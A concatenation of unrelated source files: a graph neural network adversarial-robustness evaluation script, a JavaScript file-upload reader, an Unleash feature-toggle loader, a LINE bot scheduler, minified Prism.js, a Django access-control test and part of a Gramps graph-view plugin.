for model_name in model_list:
# Corresponding model path
model_dict[model_name] = os.path.join(args.model_dir, model_name, args.model_file)
attack_dict = {}
for attack_name in config.attack_list:
for model_sur in config.model_sur_list:
attack_dict[attack_name] = os.path.join(args.attack_dir,
attack_name + "_vs_" + model_sur +
"_" + dataset_mode)
if args.save_dir is not None:
if not os.path.exists(args.save_dir):
os.makedirs(args.save_dir)
evaluator = AttackEvaluator(dataset=dataset,
build_model=config.build_model,
device=device)
adj_no = sp.csr_matrix(adj)
features_no = utils.feat_preprocess(features=features, device=device)
test_score_dict = evaluator.eval_attack(model_dict=model_dict,
adj_attack=adj_no,
features_attack=features_no)
result_dict["no_attack"][dataset_mode] = test_score_dict
if args.attack_dir:
test_score_dfs_tmp = []
for attack_name in attack_dict:
print("Evaluating {} attack..........".format(attack_name))
features_attack = np.load(os.path.join(attack_dict[attack_name], args.attack_feat_name))
with open(os.path.join(attack_dict[attack_name], args.attack_adj_name), 'rb') as f:
adj_attack = pickle.load(f)
adj_attack = sp.csr_matrix(adj_attack)
adj_attacked = sp.vstack([adj, adj_attack[:, :num_nodes]])
adj_attacked = sp.hstack([adj_attacked, adj_attack.T])
adj_attacked = sp.csr_matrix(adj_attacked)
features_attacked = np.concatenate([features, features_attack])
features_attacked = utils.feat_preprocess(features=features_attacked, device=device)
test_score_dict = evaluator.eval_attack(model_dict=model_dict,
adj_attack=adj_attacked,
features_attack=features_attacked)
result_dict[attack_name][dataset_mode] = test_score_dict
sorted_result_keys = sorted(result_dict, key=lambda x: (result_dict[x]['full']['weighted']))
result_df = pd.DataFrame.from_dict({(i, j): result_dict[i][j]
for i in sorted_result_keys
for j in result_dict[i].keys()},
orient='index')
# Calculate model-wise scores, 'average', '3-top', 'weighted'
eval_dict = {'average': {}, '3-min': {}, 'weighted': {}}
for i, dataset_mode in enumerate(args.dataset_mode):
for key in eval_dict.keys():
eval_dict[key][dataset_mode] = {}
for model_name in model_list:
model_score_sorted = sorted(list(result_df[model_name][i::len(args.dataset_mode)].values))
eval_dict['average'][dataset_mode][model_name] = np.mean(model_score_sorted)
eval_dict['3-min'][dataset_mode][model_name] = np.mean(model_score_sorted[:3])
eval_dict['weighted'][dataset_mode][model_name] = evaluator.eval_metric(model_score_sorted,
metric_type='polynomial', order='d')
sorted_eval_keys = sorted(eval_dict['weighted']['full'],
key=lambda x: (eval_dict['weighted']['full'][x]),
reverse=True)
eval_df = pd.DataFrame.from_dict({(i, j): eval_dict[i][j]
for i in eval_dict.keys()
for j in eval_dict[i].keys()},
orient='index')
result_df = result_df.append(eval_df)
result_df = result_df[sorted_eval_keys + list(result_df.columns)[-3:]]
for name in result_df.columns:
result_df[name] = pd.to_numeric(result_df[name] * 100,
errors='ignore').map('{:,.2f}'.format)
if args.save_dir is not None:
result_dict.update(eval_dict)
utils.save_dict_to_json(result_dict=result_dict,
file_dir=args.save_dir,
file_name="{}.json".format(args.dataset))
utils.save_df_to_xlsx(df=result_df,
file_dir=args.save_dir,
file_name="{}.xlsx".format(args.dataset),
verbose=True)
utils.save_df_to_csv(df=result_df,
file_dir=args.save_dir,
file_name="{}.csv".format(args.dataset))
print("Test scores saved in {}.".format(args.save_dir))
else:
pd.set_option('display.width', 1000)
print(result_df)
print("Evaluation finished.")
|
export default async function handleUpload (data) {
const file = data
try {
const fileContents = readUploadedFileAsText(file)
return fileContents
} catch (e) {
console.warn(e.message)
}
}
function readUploadedFileAsText (inputFile) {
const temporaryFileReader = new FileReader()
return new Promise((resolve, reject) => {
temporaryFileReader.onerror = () => {
temporaryFileReader.abort()
reject(new DOMException('Problem parsing input file.'))
}
temporaryFileReader.onload = () => {
resolve(temporaryFileReader.result)
}
temporaryFileReader.readAsText(inputFile)
})
}
|
from fcache.cache import FileCache
from UnleashClient.features.Feature import Feature
from UnleashClient.variants.Variants import Variants
from UnleashClient.constants import FEATURES_URL
from UnleashClient.utils import LOGGER
# pylint: disable=broad-except
def _create_strategies(provisioning: dict,
strategy_mapping: dict) -> list:
feature_strategies = []
for strategy in provisioning["strategies"]:
try:
if "parameters" in strategy.keys():
strategy_provisioning = strategy['parameters']
else:
strategy_provisioning = {}
if "constraints" in strategy.keys():
constraint_provisioning = strategy['constraints']
else:
constraint_provisioning = {}
feature_strategies.append(strategy_mapping[strategy['name']](constraints=constraint_provisioning, parameters=strategy_provisioning))
except Exception as excep:
LOGGER.warning("Failed to load strategy. This may be a problem with a custom strategy. Exception: %s",
excep)
return feature_strategies
def _create_feature(provisioning: dict,
strategy_mapping: dict) -> Feature:
if "strategies" in provisioning.keys():
parsed_strategies = _create_strategies(provisioning, strategy_mapping)
else:
parsed_strategies = []
if "variants" in provisioning:
variant = Variants(provisioning['variants'], provisioning['name'])
else:
variant = None
return Feature(name=provisioning["name"],
enabled=provisioning["enabled"],
strategies=parsed_strategies,
variants=variant
)
def load_features(cache: FileCache,
feature_toggles: dict,
strategy_mapping: dict) -> None:
"""
Caching
:param cache: Should be the cache class variable from her-unleash-client
:param feature_toggles: Should be the features class variable from her-unleash-client
:return:
"""
# Pull raw provisioning from cache.
try:
feature_provisioning = cache[FEATURES_URL]
# Parse provisioning
parsed_features = {}
feature_names = [d["name"] for d in feature_provisioning["features"]]
for provisioning in feature_provisioning["features"]:
parsed_features[provisioning["name"]] = provisioning
# Delete old features/cache
for feature in list(feature_toggles.keys()):
if feature not in feature_names:
del feature_toggles[feature]
# Update existing objects
for feature in feature_toggles.keys():
feature_for_update = feature_toggles[feature]
strategies = parsed_features[feature]["strategies"]
feature_for_update.enabled = parsed_features[feature]["enabled"]
if strategies:
parsed_strategies = _create_strategies(parsed_features[feature], strategy_mapping)
feature_for_update.strategies = parsed_strategies
if 'variants' in parsed_features[feature]:
feature_for_update.variants = Variants(
parsed_features[feature]['variants'],
parsed_features[feature]['name']
)
# Handle creation or deletions
new_features = list(set(feature_names) - set(feature_toggles.keys()))
for feature in new_features:
feature_toggles[feature] = _create_feature(parsed_features[feature], strategy_mapping)
except KeyError as cache_exception:
LOGGER.warning("Cache Exception: %s", cache_exception)
LOGGER.warning("Unleash client does not have cached features. Please make sure client can communicate with Unleash server!")
|
from apscheduler.schedulers.blocking import BlockingScheduler
from linebot import LineBotApi
from linebot.models import TextSendMessage
import urllib.request
import os
sched = BlockingScheduler()
#定時去戳 url 讓服務不中斷
@sched.scheduled_job('cron', day_of_week='mon-sun', minute='*/25')
def scheduled_job():
url = "https://{Your Heroku App Name}.herokuapp.com/"
conn = urllib.request.urlopen(url)
for key, value in conn.getheaders():
print(key, value)
print("戳一下")
#每週 1~日 的 8:30 用 Line-Bot 去 push 一個 message 對象可以是 User 也可以是 Group
@sched.scheduled_job('cron', day_of_week='mon-sun', hour=8, minute=30)
def scheduled_job():
line_bot_api = LineBotApi(os.environ['CHANNEL_ACCESS_TOKEN'])
# push message to one user or Group
line_bot_api.push_message('Person or Group Access_Token', TextSendMessage(text='You want send message') )
#每週 3 的 10:00 用 Line-Bot 去 push 一個 message 對象可以是 User 也可以是 Group
@sched.scheduled_job('cron', day_of_week='wed', hour=10)
def scheduled_job():
line_bot_api = LineBotApi(os.environ['CHANNEL_ACCESS_TOKEN'])
# push message to one user or Group
line_bot_api.push_message('Person or Group Access_Token', TextSendMessage(text='You want send message') )
sched.start()
|
/* http://prismjs.com/download.html?themes=prism&languages=clike+javascript+json */
var _self="undefined"!=typeof window?window:"undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?self:{},Prism=function(){var e=/\blang(?:uage)?-(\w+)\b/i,t=0,n=_self.Prism={manual:_self.Prism&&_self.Prism.manual,util:{encode:function(e){return e instanceof a?new a(e.type,n.util.encode(e.content),e.alias):"Array"===n.util.type(e)?e.map(n.util.encode):e.replace(/&/g,"&").replace(/</g,"<").replace(/\u00a0/g," ")},type:function(e){return Object.prototype.toString.call(e).match(/\[object (\w+)\]/)[1]},objId:function(e){return e.__id||Object.defineProperty(e,"__id",{value:++t}),e.__id},clone:function(e){var t=n.util.type(e);switch(t){case"Object":var a={};for(var r in e)e.hasOwnProperty(r)&&(a[r]=n.util.clone(e[r]));return a;case"Array":return e.map(function(e){return n.util.clone(e)})}return e}},languages:{extend:function(e,t){var a=n.util.clone(n.languages[e]);for(var r in t)a[r]=t[r];return a},insertBefore:function(e,t,a,r){r=r||n.languages;var i=r[e];if(2==arguments.length){a=arguments[1];for(var l in a)a.hasOwnProperty(l)&&(i[l]=a[l]);return i}var o={};for(var s in i)if(i.hasOwnProperty(s)){if(s==t)for(var l in a)a.hasOwnProperty(l)&&(o[l]=a[l]);o[s]=i[s]}return n.languages.DFS(n.languages,function(t,n){n===r[e]&&t!=e&&(this[t]=o)}),r[e]=o},DFS:function(e,t,a,r){r=r||{};for(var i in e)e.hasOwnProperty(i)&&(t.call(e,i,e[i],a||i),"Object"!==n.util.type(e[i])||r[n.util.objId(e[i])]?"Array"!==n.util.type(e[i])||r[n.util.objId(e[i])]||(r[n.util.objId(e[i])]=!0,n.languages.DFS(e[i],t,i,r)):(r[n.util.objId(e[i])]=!0,n.languages.DFS(e[i],t,null,r)))}},plugins:{},highlightAll:function(e,t){var a={callback:t,selector:'code[class*="language-"], [class*="language-"] code, code[class*="lang-"], [class*="lang-"] code'};n.hooks.run("before-highlightall",a);for(var r,i=a.elements||document.querySelectorAll(a.selector),l=0;r=i[l++];)n.highlightElement(r,e===!0,a.callback)},highlightElement:function(t,a,r){for(var i,l,o=t;o&&!e.test(o.className);)o=o.parentNode;o&&(i=(o.className.match(e)||[,""])[1].toLowerCase(),l=n.languages[i]),t.className=t.className.replace(e,"").replace(/\s+/g," ")+" language-"+i,o=t.parentNode,/pre/i.test(o.nodeName)&&(o.className=o.className.replace(e,"").replace(/\s+/g," ")+" language-"+i);var s=t.textContent,u={element:t,language:i,grammar:l,code:s};if(n.hooks.run("before-sanity-check",u),!u.code||!u.grammar)return u.code&&(n.hooks.run("before-highlight",u),u.element.textContent=u.code,n.hooks.run("after-highlight",u)),n.hooks.run("complete",u),void 0;if(n.hooks.run("before-highlight",u),a&&_self.Worker){var g=new Worker(n.filename);g.onmessage=function(e){u.highlightedCode=e.data,n.hooks.run("before-insert",u),u.element.innerHTML=u.highlightedCode,r&&r.call(u.element),n.hooks.run("after-highlight",u),n.hooks.run("complete",u)},g.postMessage(JSON.stringify({language:u.language,code:u.code,immediateClose:!0}))}else u.highlightedCode=n.highlight(u.code,u.grammar,u.language),n.hooks.run("before-insert",u),u.element.innerHTML=u.highlightedCode,r&&r.call(t),n.hooks.run("after-highlight",u),n.hooks.run("complete",u)},highlight:function(e,t,r){var i=n.tokenize(e,t);return a.stringify(n.util.encode(i),r)},matchGrammar:function(e,t,a,r,i,l,o){var s=n.Token;for(var u in a)if(a.hasOwnProperty(u)&&a[u]){if(u==o)return;var g=a[u];g="Array"===n.util.type(g)?g:[g];for(var c=0;c<g.length;++c){var h=g[c],f=h.inside,d=!!h.lookbehind,m=!!h.greedy,p=0,y=h.alias;if(m&&!h.pattern.global){var v=h.pattern.toString().match(/[imuy]*$/)[0];h.pattern=RegExp(h.pattern.source,v+"g")}h=h.pattern||h;for(var b=r,k=i;b<t.length;k+=t[b].length,++b){var w=t[b];if(t.length>e.length)return;if(!(w instanceof s)){h.lastIndex=0;var _=h.exec(w),P=1;if(!_&&m&&b!=t.length-1){if(h.lastIndex=k,_=h.exec(e),!_)break;for(var A=_.index+(d?_[1].length:0),j=_.index+_[0].length,x=b,O=k,S=t.length;S>x&&(j>O||!t[x].type&&!t[x-1].greedy);++x)O+=t[x].length,A>=O&&(++b,k=O);if(t[b]instanceof s||t[x-1].greedy)continue;P=x-b,w=e.slice(k,O),_.index-=k}if(_){d&&(p=_[1].length);var A=_.index+p,_=_[0].slice(p),j=A+_.length,N=w.slice(0,A),C=w.slice(j),E=[b,P];N&&(++b,k+=N.length,E.push(N));var I=new s(u,f?n.tokenize(_,f):_,y,_,m);if(E.push(I),C&&E.push(C),Array.prototype.splice.apply(t,E),1!=P&&n.matchGrammar(e,t,a,b,k,!0,u),l)break}else if(l)break}}}}},tokenize:function(e,t){var a=[e],r=t.rest;if(r){for(var i in r)t[i]=r[i];delete t.rest}return n.matchGrammar(e,a,t,0,0,!1),a},hooks:{all:{},add:function(e,t){var a=n.hooks.all;a[e]=a[e]||[],a[e].push(t)},run:function(e,t){var a=n.hooks.all[e];if(a&&a.length)for(var r,i=0;r=a[i++];)r(t)}}},a=n.Token=function(e,t,n,a,r){this.type=e,this.content=t,this.alias=n,this.length=0|(a||"").length,this.greedy=!!r};if(a.stringify=function(e,t,r){if("string"==typeof e)return e;if("Array"===n.util.type(e))return e.map(function(n){return a.stringify(n,t,e)}).join("");var i={type:e.type,content:a.stringify(e.content,t,r),tag:"span",classes:["token",e.type],attributes:{},language:t,parent:r};if("comment"==i.type&&(i.attributes.spellcheck="true"),e.alias){var l="Array"===n.util.type(e.alias)?e.alias:[e.alias];Array.prototype.push.apply(i.classes,l)}n.hooks.run("wrap",i);var o=Object.keys(i.attributes).map(function(e){return e+'="'+(i.attributes[e]||"").replace(/"/g,""")+'"'}).join(" ");return"<"+i.tag+' class="'+i.classes.join(" ")+'"'+(o?" "+o:"")+">"+i.content+"</"+i.tag+">"},!_self.document)return _self.addEventListener?(_self.addEventListener("message",function(e){var t=JSON.parse(e.data),a=t.language,r=t.code,i=t.immediateClose;_self.postMessage(n.highlight(r,n.languages[a],a)),i&&_self.close()},!1),_self.Prism):_self.Prism;var r=document.currentScript||[].slice.call(document.getElementsByTagName("script")).pop();return r&&(n.filename=r.src,n.manual||r.hasAttribute("data-manual")||("loading"!==document.readyState?window.requestAnimationFrame?window.requestAnimationFrame(n.highlightAll):window.setTimeout(n.highlightAll,16):document.addEventListener("DOMContentLoaded",n.highlightAll))),_self.Prism}();"undefined"!=typeof module&&module.exports&&(module.exports=Prism),"undefined"!=typeof global&&(global.Prism=Prism);
Prism.languages.clike={comment:[{pattern:/(^|[^\\])\/\*[\s\S]*?(?:\*\/|$)/,lookbehind:!0},{pattern:/(^|[^\\:])\/\/.*/,lookbehind:!0}],string:{pattern:/(["'])(\\(?:\r\n|[\s\S])|(?!\1)[^\\\r\n])*\1/,greedy:!0},"class-name":{pattern:/((?:\b(?:class|interface|extends|implements|trait|instanceof|new)\s+)|(?:catch\s+\())[a-z0-9_\.\\]+/i,lookbehind:!0,inside:{punctuation:/(\.|\\)/}},keyword:/\b(if|else|while|do|for|return|in|instanceof|function|new|try|throw|catch|finally|null|break|continue)\b/,"boolean":/\b(true|false)\b/,"function":/[a-z0-9_]+(?=\()/i,number:/\b-?(?:0x[\da-f]+|\d*\.?\d+(?:e[+-]?\d+)?)\b/i,operator:/--?|\+\+?|!=?=?|<=?|>=?|==?=?|&&?|\|\|?|\?|\*|\/|~|\^|%/,punctuation:/[{}[\];(),.:]/};
Prism.languages.javascript=Prism.languages.extend("clike",{keyword:/\b(as|async|await|break|case|catch|class|const|continue|debugger|default|delete|do|else|enum|export|extends|finally|for|from|function|get|if|implements|import|in|instanceof|interface|let|new|null|of|package|private|protected|public|return|set|static|super|switch|this|throw|try|typeof|var|void|while|with|yield)\b/,number:/\b-?(0[xX][\dA-Fa-f]+|0[bB][01]+|0[oO][0-7]+|\d*\.?\d+([Ee][+-]?\d+)?|NaN|Infinity)\b/,"function":/[_$a-zA-Z\xA0-\uFFFF][_$a-zA-Z0-9\xA0-\uFFFF]*(?=\()/i,operator:/-[-=]?|\+[+=]?|!=?=?|<<?=?|>>?>?=?|=(?:==?|>)?|&[&=]?|\|[|=]?|\*\*?=?|\/=?|~|\^=?|%=?|\?|\.{3}/}),Prism.languages.insertBefore("javascript","keyword",{regex:{pattern:/(^|[^\/])\/(?!\/)(\[[^\]\r\n]+]|\\.|[^\/\\\[\r\n])+\/[gimyu]{0,5}(?=\s*($|[\r\n,.;})]))/,lookbehind:!0,greedy:!0}}),Prism.languages.insertBefore("javascript","string",{"template-string":{pattern:/`(?:\\\\|\\?[^\\])*?`/,greedy:!0,inside:{interpolation:{pattern:/\$\{[^}]+\}/,inside:{"interpolation-punctuation":{pattern:/^\$\{|\}$/,alias:"punctuation"},rest:Prism.languages.javascript}},string:/[\s\S]+/}}}),Prism.languages.markup&&Prism.languages.insertBefore("markup","tag",{script:{pattern:/(<script[\s\S]*?>)[\s\S]*?(?=<\/script>)/i,lookbehind:!0,inside:Prism.languages.javascript,alias:"language-javascript"}}),Prism.languages.js=Prism.languages.javascript;
Prism.languages.json={property:/"(?:\\.|[^\\"])*"(?=\s*:)/gi,string:/"(?!:)(?:\\.|[^\\"])*"(?!:)/g,number:/\b-?(0x[\dA-Fa-f]+|\d*\.?\d+([Ee][+-]?\d+)?)\b/g,punctuation:/[{}[\]);,]/g,operator:/:/g,"boolean":/\b(true|false)\b/gi,"null":/\bnull\b/gi},Prism.languages.jsonp=Prism.languages.json;
|
from django.urls import reverse
from rest_framework import status
from rest_framework.test import force_authenticate
from core.models import UserModel
from recycle.models import CommercialRequest
from recycle.views.commercial_order import CommercialOrderDetailsAPIView
from tests.unittests.common import APIFactoryTestCase
class CommercialOrderDetailsAPITestCase(APIFactoryTestCase):
def setUp(self) -> None:
super(CommercialOrderDetailsAPITestCase, self).setUp()
self.user = UserModel.objects.get(username='CommercialUser')
self.commercial_user_2 = UserModel.objects.get(username='CommercialUser2')
self.view = CommercialOrderDetailsAPIView.as_view()
self.expected_commercial_order = CommercialRequest.objects.filter(user=self.user).first()
def test_GetInfo(self):
request = self.request_factory.get(reverse('api_v1:recycle:get_commercial_order', args=[self.expected_commercial_order.id]))
force_authenticate(request, self.user)
response = self.view(request, pk=self.expected_commercial_order.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
actual_commercial_order = response.data
self.assertEqual(actual_commercial_order['id'], self.expected_commercial_order.id)
self.assertEqual(self.expected_commercial_order.address, actual_commercial_order['address'])
self.assertEqual(self.expected_commercial_order.date.strftime('%Y-%m-%d'), actual_commercial_order['date'])
self.assertEqual(self.expected_commercial_order.garbage_type, actual_commercial_order['garbage_type'])
self.assertEqual(self.expected_commercial_order.mass, actual_commercial_order['mass'])
self.assertEqual(self.expected_commercial_order.status, actual_commercial_order['status'])
self.assertEqual(self.expected_commercial_order.location.id, actual_commercial_order['location_id'])
self.assertEqual(self.expected_commercial_order.user.id, actual_commercial_order['user_id'])
def test_NotFoundExistent(self):
request = self.request_factory.get(
reverse('api_v1:recycle:get_commercial_order', args=[self.expected_commercial_order.id]))
force_authenticate(request, self.commercial_user_2)
response = self.view(request, pk=self.expected_commercial_order.id)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
|
# -*- coding: utf-8 -*-
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2010-2012 Gary Burton
# GraphvizSvgParser is based on the Gramps XML import
# DotSvgGenerator is based on the relationship graph
# report.
# Mouse panning is derived from the pedigree view
# Copyright (C) 2012 Mathieu MD
# Copyright (C) 2015- Serge Noiraud
# Copyright (C) 2016- Ivan Komaritsyn
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# $Id$
#-------------------------------------------------------------------------
#
# Python modules
#
#-------------------------------------------------------------------------
import os
import logging
from re import MULTILINE, findall
from xml.parsers.expat import ParserCreate
import string
from subprocess import Popen, PIPE
from io import StringIO
from threading import Thread
from math import sqrt, pow
from html import escape
from collections import abc
import gi
from gi.repository import Gtk, Gdk, GdkPixbuf, GLib, Pango
#-------------------------------------------------------------------------
#
# Gramps Modules
#
#-------------------------------------------------------------------------
from gramps.gen import datehandler
from gramps.gen.config import config
from gramps.gen.constfunc import win
from gramps.gen.db import DbTxn
from gramps.gen.display.name import displayer
from gramps.gen.display.place import displayer as place_displayer
from gramps.gen.errors import WindowActiveError
from gramps.gen.lib import (Person, Family, ChildRef, Name, Surname,
ChildRefType, EventType, EventRoleType)
from gramps.gen.utils.alive import probably_alive
from gramps.gen.utils.callback import Callback
from gramps.gen.utils.db import (get_birth_or_fallback, get_death_or_fallback,
find_children, find_parents, preset_name,
find_witnessed_people)
from gramps.gen.utils.file import search_for, media_path_full, find_file
from gramps.gen.utils.libformatting import FormattingHelper
from gramps.gen.utils.thumbnails import get_thumbnail_path
from gramps.gui.dialog import (OptionDialog, ErrorDialog, QuestionDialog2,
WarningDialog)
from gramps.gui.display import display_url
from gramps.gui.editors import EditPerson, EditFamily, EditTagList
from gramps.gui.utils import (color_graph_box, color_graph_family,
rgb_to_hex, hex_to_rgb_float,
process_pending_events)
from gramps.gui.views.navigationview import NavigationView
from gramps.gui.views.bookmarks import PersonBookmarks
from gramps.gui.views.tags import OrganizeTagsDialog
from gramps.gui.widgets import progressdialog as progressdlg
from gramps.gui.widgets.menuitem import add_menuitem
from gramps.gen.utils.symbols import Symbols
from gramps.gui.pluginmanager import GuiPluginManager
from gramps.gen.plug import CATEGORY_QR_PERSON, CATEGORY_QR_FAMILY
from gramps.gui.plug.quick import run_report
from gramps.gen.const import GRAMPS_LOCALE as glocale
try:
_trans = glocale.get_addon_translator(__file__)
except ValueError:
_trans = glocale.translation
_ = _trans.gettext
if win():
DETACHED_PROCESS = 8
try:
gi.require_version('GooCanvas', '2.0')
from gi.repository import GooCanvas
except ImportError:
raise Exception("Goocanvas 2 (http://live.gnome.org/GooCanvas) is "
"required for this view to work")
if os.sys.platform == "win32":
_DOT_FOUND = search_for("dot.exe")
else:
_DOT_FOUND = search_for("dot")
if not _DOT_FOUND:
raise Exception("GraphViz (http://www.graphviz.org) is "
"required for this view to work")
SPLINE = {0: 'false', 1: 'true', 2: 'ortho'}
WIKI_PAGE = 'https://gramps-project.org/wiki/index.php?title=Graph_View'
# gtk version
gtk_version = float("%s.%s" % (Gtk.MAJOR_VERSION, Gtk.MINOR_VERSION))
#-------------------------------------------------------------------------
#
# GraphView modules
#
#-------------------------------------------------------------------------
import sys
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
from search_widget import SearchWidget, Popover, ListBoxRow, get_person_tooltip
from avatars import Avatars
#-------------------------------------------------------------------------
#
# GraphView
#
#-------------------------------------------------------------------------
class GraphView(NavigationView):
"""
View for pedigree tree.
Displays the ancestors and descendants of a selected individual.
"""
# default settings in the config file
CONFIGSETTINGS = (
('interface.graphview-show-images', True),
('interface.graphview-show-avatars', True),
('interface.graphview-avatars-style', 1),
('interface.graphview-avatars-male', ''), # custom avatar
('interface.graphview-avatars-female', ''), # custom avatar
('interface.graphview-show-full-dates', False),
('interface.graphview-show-places', False),
('interface.graphview-place-format', 0),
('interface.graphview-show-lines', 1),
('interface.graphview-show-tags', False),
('interface.graphview-highlight-home-person', True),
('interface.graphview-home-path-color', '#000000'),
('interface.graphview-descendant-generations', 10),
('interface.graphview-ancestor-generations', 3),
('interface.graphview-show-animation', True),
('interface.graphview-animation-speed', 3),
('interface.graphview-animation-count', 4),
('interface.graphview-search-all-db', True),
('interface.graphview-search-show-images', True),
('interface.graphview-search-marked-first', True),
('interface.graphview-ranksep', 5),
('interface.graphview-nodesep', 2),
('interface.graphview-person-theme', 0),
('interface.graphview-font', ['', 14]),
('interface.graphview-show-all-connected', False))
def __init__(self, pdata, dbstate, uistate, nav_group=0):
NavigationView.__init__(self, _('Graph View'), pdata, dbstate, uistate,
PersonBookmarks, nav_group)
self.show_images = self._config.get('interface.graphview-show-images')
self.show_full_dates = self._config.get(
'interface.graphview-show-full-dates')
self.show_places = self._config.get('interface.graphview-show-places')
self.show_tag_color = self._config.get('interface.graphview-show-tags')
self.highlight_home_person = self._config.get(
'interface.graphview-highlight-home-person')
self.home_path_color = self._config.get(
'interface.graphview-home-path-color')
self.descendant_generations = self._config.get(
'interface.graphview-descendant-generations')
self.ancestor_generations = self._config.get(
'interface.graphview-ancestor-generations')
self.dbstate = dbstate
self.uistate = uistate
self.graph_widget = None
self.dbstate.connect('database-changed', self.change_db)
# dict {handle, tooltip_str} of tooltips in markup format
self.tags_tooltips = {}
# for disable animation options in config dialog
self.ani_widgets = []
# for disable custom avatar options in config dialog
self.avatar_widgets = []
self.additional_uis.append(self.additional_ui)
self.define_print_actions()
self.uistate.connect('font-changed', self.font_changed)
def on_delete(self):
"""
Method called on shutdown.
See PageView class (../gramps/gui/views/pageview.py).
"""
super().on_delete()
# stop search to allow close app properly
self.graph_widget.search_widget.stop_search()
def font_changed(self):
self.graph_widget.font_changed(self.get_active())
#self.goto_handle(None)
def define_print_actions(self):
"""
Associate the print button to the PrintView action.
"""
self._add_action('PrintView', self.printview, "<PRIMARY><SHIFT>P")
self._add_action('PRIMARY-J', self.jump, '<PRIMARY>J')
def _connect_db_signals(self):
"""
Set up callbacks for changes to person and family nodes.
"""
self.callman.add_db_signal('person-update', self.goto_handle)
self.callman.add_db_signal('family-update', self.goto_handle)
self.callman.add_db_signal('event-update', self.goto_handle)
def change_db(self, _db):
"""
Set up callback for changes to the database.
"""
self._change_db(_db)
self.graph_widget.scale = 1
if self.active:
if self.get_active() != "":
self.graph_widget.populate(self.get_active())
self.graph_widget.set_available(True)
else:
self.graph_widget.set_available(False)
else:
self.dirty = True
self.graph_widget.set_available(False)
def get_stock(self):
"""
The category stock icon.
"""
return 'gramps-pedigree'
def get_viewtype_stock(self):
"""
Type of view in category.
"""
return 'gramps-pedigree'
def build_widget(self):
"""
Builds the widget with canvas and controls.
"""
self.graph_widget = GraphWidget(self, self.dbstate, self.uistate)
return self.graph_widget.get_widget()
def build_tree(self):
"""
There is no separate step to fill the widget with data.
The data is populated as part of canvas widget construction.
It can be called to rebuild tree.
"""
if self.active:
if self.get_active() != "":
self.graph_widget.populate(self.get_active())
additional_ui = [ # Defines the UI string for UIManager
'''
<placeholder id="CommonGo">
<section>
<item>
<attribute name="action">win.Back</attribute>
<attribute name="label" translatable="yes">_Back</attribute>
</item>
<item>
<attribute name="action">win.Forward</attribute>
<attribute name="label" translatable="yes">_Forward</attribute>
</item>
</section>
<section>
<item>
<attribute name="action">win.HomePerson</attribute>
<attribute name="label" translatable="yes">_Home</attribute>
</item>
</section>
</placeholder>
''',
'''
<section id='CommonEdit' groups='RW'>
<item>
<attribute name="action">win.PrintView</attribute>
<attribute name="label" translatable="yes">_Print...</attribute>
</item>
</section>
''', # Following are the Toolbar items
'''
<placeholder id='CommonNavigation'>
<child groups='RO'>
<object class="GtkToolButton">
<property name="icon-name">go-previous</property>
<property name="action-name">win.Back</property>
<property name="tooltip_text" translatable="yes">'''
'''Go to the previous object in the history</property>
<property name="label" translatable="yes">_Back</property>
<property name="use-underline">True</property>
</object>
<packing>
<property name="homogeneous">False</property>
</packing>
</child>
<child groups='RO'>
<object class="GtkToolButton">
<property name="icon-name">go-next</property>
<property name="action-name">win.Forward</property>
<property name="tooltip_text" translatable="yes">'''
'''Go to the next object in the history</property>
<property name="label" translatable="yes">_Forward</property>
<property name="use-underline">True</property>
</object>
<packing>
<property name="homogeneous">False</property>
</packing>
</child>
<child groups='RO'>
<object class="GtkToolButton">
<property name="icon-name">go-home</property>
<property name="action-name">win.HomePerson</property>
<property name="tooltip_text" translatable="yes">'''
'''Go to the default person</property>
<property name="label" translatable="yes">_Home</property>
<property name="use-underline">True</property>
</object>
<packing>
<property name="homogeneous">False</property>
</packing>
</child>
</placeholder>
''',
'''
<placeholder id='BarCommonEdit'>
<child groups='RO'>
<object class="GtkToolButton">
<property name="icon-name">document-print</property>
<property name="action-name">win.PrintView</property>
<property name="tooltip_text" translatable="yes">"Save the dot file '''
'''for a later print.\nThis will save a .gv file and a svg file.\n'''
'''You must select a .gv file"</property>
<property name="label" translatable="yes">_Print...</property>
<property name="use-underline">True</property>
</object>
<packing>
<property name="homogeneous">False</property>
</packing>
</child>
</placeholder>
''']
def navigation_type(self):
"""
The type of forward and backward navigation to perform.
"""
return 'Person'
def goto_handle(self, handle):
"""
Go to a named handle.
"""
if self.active:
if self.get_active() != "":
self.graph_widget.populate(self.get_active())
self.graph_widget.set_available(True)
else:
self.dirty = True
self.graph_widget.set_available(False)
def change_active_person(self, _menuitem=None, person_handle=''):
"""
Change active person.
"""
if person_handle:
self.change_active(person_handle)
def can_configure(self):
"""
See :class:`~gui.views.pageview.PageView
:return: bool
"""
return True
def cb_update_show_images(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the images setting.
"""
self.show_images = entry == 'True'
self.graph_widget.populate(self.get_active())
def cb_update_show_avatars(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the avatars setting.
"""
self.show_avatars = entry == 'True'
self.graph_widget.populate(self.get_active())
def cb_update_avatars_style(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the avatars setting.
"""
for widget in self.avatar_widgets:
widget.set_visible(entry == '0')
self.graph_widget.populate(self.get_active())
def cb_on_combo_show(self, combobox):
"""
Called when the configuration menu show combobox widget for avatars.
Used to hide custom avatars settings.
"""
for widget in self.avatar_widgets:
widget.set_visible(combobox.get_active() == 0)
def cb_male_avatar_set(self, file_chooser_button):
"""
Called when the configuration menu changes the male avatar.
"""
self._config.set('interface.graphview-avatars-male',
file_chooser_button.get_filename())
self.graph_widget.populate(self.get_active())
def cb_female_avatar_set(self, file_chooser_button):
"""
Called when the configuration menu changes the female avatar.
"""
self._config.set('interface.graphview-avatars-female',
file_chooser_button.get_filename())
self.graph_widget.populate(self.get_active())
